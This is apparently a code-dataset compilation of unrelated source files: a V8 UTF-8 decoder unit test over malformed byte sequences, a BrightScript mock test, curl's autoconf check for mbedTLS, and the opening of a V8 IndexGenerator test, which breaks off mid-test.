{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6 bytes (not supported)
{{0xFC, 0x84, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Last possible sequence of certain length:
// 1 byte
{{0x7F}, {0x7F}},
// 2 bytes
{{0xDF, 0xBF}, {0x7FF}},
// 3 bytes
{{0xEF, 0xBF, 0xBF}, {0xFFFF}},
// 4 bytes (this sequence is not a valid code point)
{{0xF7, 0xBF, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5 bytes (not supported)
{{0xFB, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6 bytes (not supported)
{{0xFD, 0xBF, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Other boundary conditions:
{{0xED, 0x9F, 0xBF}, {0xD7FF}},
{{0xEE, 0x80, 0x80}, {0xE000}},
// U+fffd (invalid code point)
{{0xEF, 0xBF, 0xBD}, {0xFFFD}},
// U+10ffff (last valid code point)
{{0xF4, 0x8F, 0xBF, 0xBF}, {0x10FFFF}},
// First invalid (too large) code point
{{0xF4, 0x90, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Malformed sequences:
// Unexpected continuation bytes:
// First continuation byte
{{0x80}, {0xFFFD}},
// Last continuation byte
{{0xBF}, {0xFFFD}},
// 2 continuation bytes
{{0x80, 0xBF}, {0xFFFD, 0xFFFD}},
// 3 continuation bytes
{{0x80, 0xBF, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
// 4 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF, 0x80, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 7 continuation bytes
{{0x80, 0xBF, 0x80, 0xBF, 0x80, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Sequence of all 64 possible continuation bytes
{{0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87, 0x88, 0x89, 0x8A,
0x8B, 0x8C, 0x8D, 0x8E, 0x8F, 0x90, 0x91, 0x92, 0x93, 0x94, 0x95,
0x96, 0x97, 0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F, 0xA0,
0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB,
0xAC, 0xAD, 0xAE, 0xAF, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6,
0xB7, 0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Using each possible continuation byte in a two-byte sequence:
{{0xD0, 0x80, 0xD0, 0x81, 0xD0, 0x82, 0xD0, 0x83, 0xD0, 0x84, 0xD0, 0x85,
0xD0, 0x86, 0xD0, 0x87, 0xD0, 0x88, 0xD0, 0x89, 0xD0, 0x8A, 0xD0, 0x8B,
0xD0, 0x8C, 0xD0, 0x8D, 0xD0, 0x8E, 0xD0, 0x8F, 0xD0, 0x90, 0xD0, 0x91,
0xD0, 0x92, 0xD0, 0x93, 0xD0, 0x94, 0xD0, 0x95, 0xD0, 0x96, 0xD0, 0x97,
0xD0, 0x98, 0xD0, 0x99, 0xD0, 0x9A, 0xD0, 0x9B, 0xD0, 0x9C, 0xD0, 0x9D,
0xD0, 0x9E, 0xD0, 0x9F, 0xD0, 0xA0, 0xD0, 0xA1, 0xD0, 0xA2, 0xD0, 0xA3,
0xD0, 0xA4, 0xD0, 0xA5, 0xD0, 0xA6, 0xD0, 0xA7, 0xD0, 0xA8, 0xD0, 0xA9,
0xD0, 0xAA, 0xD0, 0xAB, 0xD0, 0xAC, 0xD0, 0xAD, 0xD0, 0xAE, 0xD0, 0xAF,
0xD0, 0xB0, 0xD0, 0xB1, 0xD0, 0xB2, 0xD0, 0xB3, 0xD0, 0xB4, 0xD0, 0xB5,
0xD0, 0xB6, 0xD0, 0xB7, 0xD0, 0xB8, 0xD0, 0xB9, 0xD0, 0xBA, 0xD0, 0xBB,
0xD0, 0xBC, 0xD0, 0xBD, 0xD0, 0xBE, 0xD0, 0xBF},
{0x400, 0x401, 0x402, 0x403, 0x404, 0x405, 0x406, 0x407, 0x408, 0x409,
0x40A, 0x40B, 0x40C, 0x40D, 0x40E, 0x40F, 0x410, 0x411, 0x412, 0x413,
0x414, 0x415, 0x416, 0x417, 0x418, 0x419, 0x41A, 0x41B, 0x41C, 0x41D,
0x41E, 0x41F, 0x420, 0x421, 0x422, 0x423, 0x424, 0x425, 0x426, 0x427,
0x428, 0x429, 0x42A, 0x42B, 0x42C, 0x42D, 0x42E, 0x42F, 0x430, 0x431,
0x432, 0x433, 0x434, 0x435, 0x436, 0x437, 0x438, 0x439, 0x43A, 0x43B,
0x43C, 0x43D, 0x43E, 0x43F}},
// Lonely first bytes:
// All 32 first bytes of 32-byte sequences, each followed by a space
// (generates 32 invalid char + space sequences.
{{0xC0, 0x20, 0xC1, 0x20, 0xC2, 0x20, 0xC3, 0x20, 0xC4, 0x20, 0xC5,
0x20, 0xC6, 0x20, 0xC7, 0x20, 0xC8, 0x20, 0xC9, 0x20, 0xCA, 0x20,
0xCB, 0x20, 0xCC, 0x20, 0xCD, 0x20, 0xCE, 0x20, 0xCF, 0x20, 0xD0,
0x20, 0xD1, 0x20, 0xD2, 0x20, 0xD3, 0x20, 0xD4, 0x20, 0xD5, 0x20,
0xD6, 0x20, 0xD7, 0x20, 0xD8, 0x20, 0xD9, 0x20, 0xDA, 0x20, 0xDB,
0x20, 0xDC, 0x20, 0xDD, 0x20, 0xDE, 0x20, 0xDF, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 16 first bytes of 3-byte sequences, each followed by a space
// (generates 16 invalid char + space sequences):
{{0xE0, 0x20, 0xE1, 0x20, 0xE2, 0x20, 0xE3, 0x20, 0xE4, 0x20, 0xE5,
0x20, 0xE6, 0x20, 0xE7, 0x20, 0xE8, 0x20, 0xE9, 0x20, 0xEA, 0x20,
0xEB, 0x20, 0xEC, 0x20, 0xED, 0x20, 0xEE, 0x20, 0xEF, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 8 first bytes of 4-byte sequences, each followed by a space
// (generates 8 invalid char + space sequences):
{{0xF0, 0x20, 0xF1, 0x20, 0xF2, 0x20, 0xF3, 0x20, 0xF4, 0x20, 0xF5, 0x20,
0xF6, 0x20, 0xF7, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20,
0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 4 first bytes of 5-byte sequences (not supported), each followed by
// a space (generates 4 invalid char + space sequences):
{{0xF8, 0x20, 0xF9, 0x20, 0xFA, 0x20, 0xFB, 0x20},
{0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20, 0xFFFD, 0x20}},
// All 2 first bytes of 6-byte sequences (not supported), each followed by
// a space (generates 2 invalid char + space sequences):
{{0xFC, 0x20, 0xFD, 0x20}, {0xFFFD, 0x20, 0xFFFD, 0x20}},
// Sequences with last continuation byte missing. Normally the whole
// incomplete sequence generates a single invalid character (exceptions
// explained below).
// 2-byte sequences with last byte missing
{{0xC0}, {0xFFFD}},
{{0xDF}, {0xFFFD}},
// 3-byte sequences with last byte missing.
{{0xE8, 0x80}, {0xFFFD}},
{{0xE0, 0xBF}, {0xFFFD}},
{{0xEF, 0xBF}, {0xFFFD}},
// Start of an overlong sequence. The first "maximal subpart" is the first
// byte; it creates an invalid character. Each following byte generates an
// invalid character too.
{{0xE0, 0x80}, {0xFFFD, 0xFFFD}},
// 4-byte sequences with last byte missing
{{0xF1, 0x80, 0x80}, {0xFFFD}},
{{0xF4, 0x8F, 0xBF}, {0xFFFD}},
// Start of an overlong sequence. The first "maximal subpart" is the first
// byte; it creates an invalid character. Each following byte generates an
// invalid character too.
{{0xF0, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequences (not supported) with last byte missing
{{0xF8, 0x80, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFB, 0xBF, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequences (not supported) with last byte missing
{{0xFC, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFD, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Concatenation of incomplete sequences: above incomplete sequences
// concatenated.
{{0xC0, 0xDF, 0xE8, 0x80, 0xE0, 0xBF, 0xEF, 0xBF, 0xE0, 0x80,
0xF1, 0x80, 0x80, 0xF4, 0x8F, 0xBF, 0xF0, 0x80, 0x80, 0xF8,
0x80, 0x80, 0x80, 0xFB, 0xBF, 0xBF, 0xBF, 0xFC, 0x80, 0x80,
0x80, 0x80, 0xFD, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD,
0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Incomplete sequence tests repeated with a space after the incomplete
// sequence.
// 2-byte sequences with last byte missing
{{0xC0, 0x20}, {0xFFFD, 0x20}},
{{0xDF, 0x20}, {0xFFFD, 0x20}},
// 3-byte sequences with last byte missing
{{0xE8, 0x80, 0x20}, {0xFFFD, 0x20}},
{{0xE0, 0xBF, 0x20}, {0xFFFD, 0x20}},
{{0xEF, 0xBF, 0x20}, {0xFFFD, 0x20}},
// Start of overlong 3-byte sequence with last byte missing
{{0xE0, 0x80, 0x20}, {0xFFFD, 0xFFFD, 0x20}},
// 4-byte sequences with last byte missing
{{0xF1, 0x80, 0x80, 0x20}, {0xFFFD, 0x20}},
{{0xF4, 0x8F, 0xBF, 0x20}, {0xFFFD, 0x20}},
// Start of overlong 4-byte sequence with last byte missing
{{0xF0, 0x80, 0x80, 0x20}, {0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
// 5-byte sequences (not supported) with last byte missing
{{0xF8, 0x80, 0x80, 0x80, 0x20}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
{{0xFB, 0xBF, 0xBF, 0xBF, 0x20}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
// 6-byte sequences (not supported) with last byte missing
{{0xFC, 0x80, 0x80, 0x80, 0x80, 0x20},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
{{0xFD, 0xBF, 0xBF, 0xBF, 0xBF, 0x20},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0x20}},
// Impossible bytes
{{0xFE}, {0xFFFD}},
{{0xFF}, {0xFFFD}},
{{0xFE, 0xFE, 0xFF, 0xFF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Lead-byte-like bytes which aren't valid lead bytes.
{{0xC0}, {0xFFFD}},
{{0xC0, 0xAA}, {0xFFFD, 0xFFFD}},
{{0xC1}, {0xFFFD}},
{{0xC1, 0xAA}, {0xFFFD, 0xFFFD}},
{{0xF5}, {0xFFFD}},
{{0xF5, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF6}, {0xFFFD}},
{{0xF6, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF7}, {0xFFFD}},
{{0xF7, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF8}, {0xFFFD}},
{{0xF8, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF9}, {0xFFFD}},
{{0xF9, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFA}, {0xFFFD}},
{{0xFA, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFB}, {0xFFFD}},
{{0xFB, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFC}, {0xFFFD}},
{{0xFC, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFD}, {0xFFFD}},
{{0xFD, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFE}, {0xFFFD}},
{{0xFE, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xFF}, {0xFFFD}},
{{0xFF, 0xAA, 0xAA, 0xAA}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Overlong sequences:
// Overlong encodings for "/"
{{0xC0, 0xAF}, {0xFFFD, 0xFFFD}},
{{0xE0, 0x80, 0xAF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF0, 0x80, 0x80, 0xAF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequence (not supported anyway)
{{0xF8, 0x80, 0x80, 0x80, 0xAF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequence (not supported anyway)
{{0xFC, 0x80, 0x80, 0x80, 0x80, 0xAF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Maximum overlong sequences
{{0xC1, 0xBF}, {0xFFFD, 0xFFFD}},
{{0xE0, 0x9F, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF0, 0x8F, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequence (not supported anyway)
{{0xF8, 0x87, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequence (not supported anyway)
{{0xFC, 0x83, 0xBF, 0xBF, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Overlong encodings for 0
{{0xC0, 0x80}, {0xFFFD, 0xFFFD}},
{{0xE0, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xF0, 0x80, 0x80, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 5-byte sequence (not supported anyway)
{{0xF8, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// 6-byte sequence (not supported anyway)
{{0xFC, 0x80, 0x80, 0x80, 0x80, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Illegal code positions:
// Single UTF-16 surrogates
{{0xED, 0xA0, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xA0, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAD, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAE, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xB0, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xBE, 0x80}, {0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xBF, 0xBF}, {0xFFFD, 0xFFFD, 0xFFFD}},
// Paired surrogates
{{0xED, 0xA0, 0x80, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xA0, 0x80, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAD, 0xBF, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAD, 0xBF, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAE, 0x80, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAE, 0x80, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAF, 0xBF, 0xED, 0xB0, 0x80},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
{{0xED, 0xAF, 0xBF, 0xED, 0xBF, 0xBF},
{0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD, 0xFFFD}},
// Surrogates with the last byte missing.
{{0xED, 0xA0}, {0xFFFD, 0xFFFD}},
{{0xED, 0xA0}, {0xFFFD, 0xFFFD}},
{{0xED, 0xAD}, {0xFFFD, 0xFFFD}},
{{0xED, 0xAE}, {0xFFFD, 0xFFFD}},
{{0xED, 0xAF}, {0xFFFD, 0xFFFD}},
{{0xED, 0xB0}, {0xFFFD, 0xFFFD}},
{{0xED, 0xBE}, {0xFFFD, 0xFFFD}},
{{0xED, 0xBF}, {0xFFFD, 0xFFFD}},
// Other non-characters
{{0xEF, 0xBF, 0xBE}, {0xFFFE}},
{{0xEF, 0xBF, 0xBF}, {0xFFFF}},
{{0xEF, 0xB7, 0x90, 0xEF, 0xB7, 0x91, 0xEF, 0xB7, 0x92, 0xEF, 0xB7, 0x93,
0xEF, 0xB7, 0x94, 0xEF, 0xB7, 0x95, 0xEF, 0xB7, 0x96, 0xEF, 0xB7, 0x97,
0xEF, 0xB7, 0x98, 0xEF, 0xB7, 0x99, 0xEF, 0xB7, 0x9A, 0xEF, 0xB7, 0x9B,
0xEF, 0xB7, 0x9C, 0xEF, 0xB7, 0x9D, 0xEF, 0xB7, 0x9E, 0xEF, 0xB7, 0x9F,
0xEF, 0xB7, 0xA0, 0xEF, 0xB7, 0xA1, 0xEF, 0xB7, 0xA2, 0xEF, 0xB7, 0xA3,
0xEF, 0xB7, 0xA4, 0xEF, 0xB7, 0xA5, 0xEF, 0xB7, 0xA6, 0xEF, 0xB7, 0xA7,
0xEF, 0xB7, 0xA8, 0xEF, 0xB7, 0xA9, 0xEF, 0xB7, 0xAA, 0xEF, 0xB7, 0xAB,
0xEF, 0xB7, 0xAC, 0xEF, 0xB7, 0xAD, 0xEF, 0xB7, 0xAE, 0xEF, 0xB7, 0xAF},
{0xFDD0, 0xFDD1, 0xFDD2, 0xFDD3, 0xFDD4, 0xFDD5, 0xFDD6, 0xFDD7,
0xFDD8, 0xFDD9, 0xFDDA, 0xFDDB, 0xFDDC, 0xFDDD, 0xFDDE, 0xFDDF,
0xFDE0, 0xFDE1, 0xFDE2, 0xFDE3, 0xFDE4, 0xFDE5, 0xFDE6, 0xFDE7,
0xFDE8, 0xFDE9, 0xFDEA, 0xFDEB, 0xFDEC, 0xFDED, 0xFDEE, 0xFDEF}},
{{0xF0, 0x9F, 0xBF, 0xBE, 0xF0, 0x9F, 0xBF, 0xBF, 0xF0, 0xAF, 0xBF,
0xBE, 0xF0, 0xAF, 0xBF, 0xBF, 0xF0, 0xBF, 0xBF, 0xBE, 0xF0, 0xBF,
0xBF, 0xBF, 0xF1, 0x8F, 0xBF, 0xBE, 0xF1, 0x8F, 0xBF, 0xBF, 0xF1,
0x9F, 0xBF, 0xBE, 0xF1, 0x9F, 0xBF, 0xBF, 0xF1, 0xAF, 0xBF, 0xBE,
0xF1, 0xAF, 0xBF, 0xBF, 0xF1, 0xBF, 0xBF, 0xBE, 0xF1, 0xBF, 0xBF,
0xBF, 0xF2, 0x8F, 0xBF, 0xBE, 0xF2, 0x8F, 0xBF, 0xBF},
{0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE, 0x3FFFF, 0x4FFFE, 0x4FFFF,
0x5FFFE, 0x5FFFF, 0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF}},
};
for (auto test : data) {
// For figuring out which test fails:
fprintf(stderr, "test: ");
for (auto b : test.bytes) {
fprintf(stderr, "%x ", b);
}
fprintf(stderr, "\n");
std::vector<unibrow::uchar> output_normal;
DecodeNormally(test.bytes, &output_normal);
CHECK_EQ(output_normal.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_normal.size(); ++i) {
CHECK_EQ(output_normal[i], test.unicode_expected[i]);
}
std::vector<unibrow::uchar> output_incremental;
DecodeIncrementally(test.bytes, &output_incremental);
CHECK_EQ(output_incremental.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_incremental.size(); ++i) {
CHECK_EQ(output_incremental[i], test.unicode_expected[i]);
}
std::vector<unibrow::uchar> output_utf16;
DecodeUtf16(test.bytes, &output_utf16);
CHECK_EQ(output_utf16.size(), test.unicode_expected.size());
for (size_t i = 0; i < output_utf16.size(); ++i) {
CHECK_EQ(output_utf16[i], test.unicode_expected[i]);
}
}
}
} // namespace internal
} // namespace v8
| C++ | 5 | EXHades/v8 | test/unittests/strings/unicode-unittest.cc | [
"BSD-3-Clause"
] |
sub init()
print formatJSON({}) ' => {real: 'json'}
print http_get() ' => GET status: 200
print http_post() ' => POST status: 200
print isValid() ' => false
print shouldBeMocked() ' => "mocked correctly!"
end sub
| Brightscript | 2 | lkipke/brs | test/e2e/resources/components/mocks/components/partial/MockComponentPartial_NoMocks_Testbed.brs | [
"MIT"
] |
#***************************************************************************
# _ _ ____ _
# Project ___| | | | _ \| |
# / __| | | | |_) | |
# | (__| |_| | _ <| |___
# \___|\___/|_| \_\_____|
#
# Copyright (C) 1998 - 2021, Daniel Stenberg, <daniel@haxx.se>, et al.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at https://curl.se/docs/copyright.html.
#
# You may opt to use, copy, modify, merge, publish, distribute and/or sell
# copies of the Software, and permit persons to whom the Software is
# furnished to do so, under the terms of the COPYING file.
#
# This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
# KIND, either express or implied.
#
#***************************************************************************
dnl ----------------------------------------------------
dnl check for mbedTLS
dnl ----------------------------------------------------
AC_DEFUN([CURL_WITH_MBEDTLS], [
if test "x$OPT_MBEDTLS" != xno; then
_cppflags=$CPPFLAGS
_ldflags=$LDFLAGS
ssl_msg=
if test X"$OPT_MBEDTLS" != Xno; then
if test "$OPT_MBEDTLS" = "yes"; then
OPT_MBEDTLS=""
fi
if test -z "$OPT_MBEDTLS" ; then
dnl check for lib first without setting any new path
AC_CHECK_LIB(mbedtls, mbedtls_havege_init,
dnl libmbedtls found, set the variable
[
AC_DEFINE(USE_MBEDTLS, 1, [if mbedTLS is enabled])
AC_SUBST(USE_MBEDTLS, [1])
MBEDTLS_ENABLED=1
USE_MBEDTLS="yes"
ssl_msg="mbedTLS"
test mbedtls != "$DEFAULT_SSL_BACKEND" || VALID_DEFAULT_SSL_BACKEND=yes
], [], -lmbedx509 -lmbedcrypto)
fi
addld=""
addlib=""
addcflags=""
mbedtlslib=""
if test "x$USE_MBEDTLS" != "xyes"; then
dnl add the path and test again
addld=-L$OPT_MBEDTLS/lib$libsuff
addcflags=-I$OPT_MBEDTLS/include
mbedtlslib=$OPT_MBEDTLS/lib$libsuff
LDFLAGS="$LDFLAGS $addld"
if test "$addcflags" != "-I/usr/include"; then
CPPFLAGS="$CPPFLAGS $addcflags"
fi
AC_CHECK_LIB(mbedtls, mbedtls_ssl_init,
[
AC_DEFINE(USE_MBEDTLS, 1, [if mbedTLS is enabled])
AC_SUBST(USE_MBEDTLS, [1])
MBEDTLS_ENABLED=1
USE_MBEDTLS="yes"
ssl_msg="mbedTLS"
test mbedtls != "$DEFAULT_SSL_BACKEND" || VALID_DEFAULT_SSL_BACKEND=yes
],
[
CPPFLAGS=$_cppflags
LDFLAGS=$_ldflags
], -lmbedx509 -lmbedcrypto)
fi
if test "x$USE_MBEDTLS" = "xyes"; then
AC_MSG_NOTICE([detected mbedTLS])
check_for_ca_bundle=1
LIBS="-lmbedtls -lmbedx509 -lmbedcrypto $LIBS"
if test -n "$mbedtlslib"; then
dnl when shared libs were found in a path that the run-time
dnl linker doesn't search through, we need to add it to
dnl CURL_LIBRARY_PATH to prevent further configure tests to fail
dnl due to this
if test "x$cross_compiling" != "xyes"; then
CURL_LIBRARY_PATH="$CURL_LIBRARY_PATH:$mbedtlslib"
export CURL_LIBRARY_PATH
AC_MSG_NOTICE([Added $mbedtlslib to CURL_LIBRARY_PATH])
fi
fi
fi
fi dnl mbedTLS not disabled
test -z "$ssl_msg" || ssl_backends="${ssl_backends:+$ssl_backends, }$ssl_msg"
fi
])
| M4 | 4 | Greg-Muchka/curl | m4/curl-mbedtls.m4 | [
"curl"
] |
// Copyright 2020 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "src/heap/index-generator.h"
#include "test/unittests/test-utils.h"
namespace v8 {
namespace internal {
TEST(IndexGeneratorTest, Empty) {
IndexGenerator gen(0);
EXPECT_EQ(base::nullopt, gen.GetNext());
}
TEST(IndexGeneratorTest, GetNext) {
IndexGenerator gen(11);
EXPECT_EQ(0U, gen.GetNext());
EXPECT_EQ(5U, gen.GetNext());
EXPECT_EQ(2U, gen.GetNext());
EXPECT_EQ(8U, gen.GetNext());
EXPECT_EQ(1U, gen.GetNext());
EXPECT_EQ(3U, gen.GetNext());
EXPECT_EQ(6U, gen.GetNext());
EXPECT_EQ(9U, gen.GetNext());
EXPECT_EQ(4U, gen.GetNext());
EXPECT_EQ(7U, gen.GetNext());
EXPECT_EQ(10U, gen.GetNext());
EXPECT_EQ(base::nullopt, gen.GetNext());
}
TEST(IndexGeneratorTest, GiveBack) {
IndexGenerator gen(4);
EXPECT_EQ(0U, gen.GetNext());
EXPECT_EQ(2U, gen.GetNext());
EXPECT_EQ(1U, gen.GetNext());
gen.GiveBack(2);
gen.GiveBack(0);
EXPECT_EQ(0U, gen.GetNext());
EXPECT_EQ(2U, gen.GetNext());
EXPECT_EQ(3U, gen.GetNext());
